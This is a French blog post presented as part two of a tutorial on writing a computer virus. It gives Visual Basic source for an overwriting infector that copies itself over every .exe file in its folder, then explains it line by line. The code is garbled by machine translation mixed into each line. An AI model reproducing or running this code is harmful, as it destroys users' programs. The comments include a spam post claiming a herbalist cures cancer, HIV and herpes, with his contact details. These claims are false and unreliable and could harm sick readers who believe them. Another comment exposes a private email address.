mercredi 18 mai 2011

Comment crée un virus informatique ''bete et méchant" 2nd partie

Les virus informatiques sont sous de nombreuses formes avec de nombreuses fonctions différentes. Certains sont plutôt simplistes et peuvent être détectés par l'utilisateur moyen tandis que d'autres sont complexes et passent inaperçus pendant un certain temps. Les virus les plus courants relevant de la classification des infecteurs de fichiers, qui fonctionnent en infectant des fichiers exécutables. Ils y parviennent en insérant leur code malveillant dans une zone du fichier d'origine, lui permettant d'être exécutée chaque fois que le fichier est accessible Certains d'entre eux sont capables de complètement écraser un fichier, ce qui rend tout un programme inutile.

C’est le cas de ce type de virus que nous allons voir aujourd’hui. Les virus Overwritters.
Je sais que les virus overwritters , n'ont malheureusement plus aucune chance de se propager et ils ne sont pas "intelligent". Malgré tout cela overwritters peut vous aider à comprendre les bases du VRAI virus. Je vais vous donner le code d'abord et ensuite on va le passer en revue.
-=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=

 Option Explicit Option Explicit
 Dim myarray() As Byte myarray Dim () As Byte
 Dim victim As String victime Dim As String
 Const mysize As Integer = 11776 mysize Const As Integer = 11776

 Private Sub Form_Load() Private Sub Form_Load ()
 On Error Resume Next On Error Resume Next
 Dim Free Dim gratuit
 Free = FreeFile Free = FreeFile

 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free
 ReDim myarray(mysize) ReDim MonTableau (mysize)
 Get #1, 1, myarray Obtenez myarray # 1, 1,
 Close #Free Close # Free

 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")
 While victim <> "" Bien que victime <> ""

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free
 Put #1, , myarray Put # 1,, myarray
 Put #1, , mysize Put # 1,, mysize
 Close #Free Close # Free

 victim = Dir() victime = Dir ()

 Wend Wend

 End End
 End Sub End Sub
  -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=

Décodons tout cela : (miam ! J)
 Option Explicit Option Explicit
 Dim myarray() As Byte myarray Dim () As Byte
 Dim victim As String victime Dim As String
 Const mysize As Integer = 11776 mysize Const As Integer = 11776
Ici, nous définissons les variables que nous allons utiliser, le "myarray ()" variable qui contient le code binaire du virus, "victime" est la variable qui contient le nom du fichier de la victime et le "mysize" variable contient la taille du virus.
 Private Sub Form_Load() Private Sub Form_Load ()
 On Error Resume Next On Error Resume Next
Nous ouvrons le sous dossier que nous allons utiliser (Form_Load), et nous avons mis notre erreur poignée c'est-à-dire qu’en cas d’erreur le programme s’arrêtera là.
 Dim Free Dim gratuit
 Free = FreeFile Free = FreeFile
C'est une bonne idée de prendre exemple sur le virus y2k. Cela vous débarrasse de la lecture / écriture des erreurs, car il est open source.
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free
 ReDim myarray(mysize) ReDim MonTableau (mysize)
 Get #1, 1, myarray Obtenez myarray # 1, 1,
 Close #Free Close # Free
Maintenant, nous allons sortir le code binaire de nos virus et nous allons le stocker dans la variable "myarray".
 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")
 While victim <> "" Bien que victime <> ""

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free
 Put #1, , myarray Put # 1,, myarray
 Put #1, , mysize Put # 1,, mysize
 Close #Free Close # Free
Ici, nous définissons la variable « victime » et nous avons mis notre code binaire dans le programme de la victime.
 victim = Dir() victime = Dir ()

 Wend Wend
Puis nous avons mis la victime à zéro, et nous répétons l'ensemble du processus d'infecter tous les fichiers. Exe dans le répertoire courant.
 End End
 End Sub End Sub
Et enfin, nous fermons le programme et les sous dossiers.
                                                                                                             D’après S.T de djib

3 commentaires:

  1. Bonsoir djibhacker mon nom est gueye amadou je suis informaticien et j'aimerais être un grand hacker mais je ne sais pas par où commencer. J'ai suivi des tuto mais je ne parviens pas à trouver ce que je veux jus qu'aujourd'hui sur ton blog. Stp aide moi à réaliser mon veux le plus cher. Voici mon compte gmail amadougueye299@gmail.com

    RépondreSupprimer
  2. Bonjour,
    ce que tu fait m'intéresse vraiment et j'aimerais vraiment que tu continues ces tutos virus.

    Jte kiff

    RépondreSupprimer
  3. Je suis assez audacieux parmi beaucoup d'autres pour déclarer qu'il existe maintenant un remède puissant à cette maladie, mais que beaucoup l'ignorent. J'ai découvert que j'avais été infecté par le virus il y a 3 mois, après un examen médical. Mon médecin m'a dit et j'ai été choqué, confus et me suis senti comme mon monde s'est effondré. J'étais en train de mourir lentement à cause de l'annonce de mon médecin mais il m'a assuré que je pourrais quitter une vie normale si je prenais mes médicaments (car il n'y avait aucun traitement médical connu contre l'herpès). Je suis allé d'églises en églises, mais j'ai vite constaté que mon cas nécessitait une attention urgente car je devenais mince, de peur de mourir de sitôt. Pour tenter de trouver une solution durable à ma situation difficile, j'ai cherché des solutions issues du monde des plantes médicinales. Je suis allé en ligne et j'ai recherché tous les puissants praticiens trado-médicaux que je pouvais traiter, car j'ai entendu dire que les herbes africaines guérissaient le syndrome de l'herpès. Après un peu de temps sur le Web, je suis tombé sur un Dr Itua (un puissant docteur africain en plantes médicinales), qui m'a proposé de m'aider moyennant des frais monétaires. Je devais me conformer car c'était mon dernier arrêt de bus pour recevoir une guérison parfaite. Ma dernière résolution était de me suicider si ce plan échouait. Enfin cela a bien fonctionné. Il me donna quelques pas à suivre et je suivis méticuleusement toutes ses instructions. Le mois dernier, pour être plus précis, je suis retourné à l'hôpital pour effectuer un autre test et, à mon grand étonnement, les résultats ont montré que le négatif, le Dr Itua peut aussi guérir la maladie qui suit… Cancer, VIH, herpès, hépatite B, inflammation du foie, Diabète, Fribroïde, Lymphome non-Hodgkinien, Cancer de la peau, Cancer utérin, Cancer de la prostate, Infertilité, Fibromyalgie, Obtenir votre dos, Als, SYPHILLIS, Maladie génétique, Épilepsie, Maladie de Parkinson..Vous pouvez vous libérer de ce virus Herpès par consulter ce grand docteur africain en herbes via cet e-mail: drituaherbalcenter@gmail.com ou appeler et whatsapp lui au +2348149277967 Il vous aidera et son médicament à base d'herbes est sûr. il a le remède contre toutes les maladies. Vous pouvez me parler sur INSTAGRAM..tashamoore219 ....

    RépondreSupprimer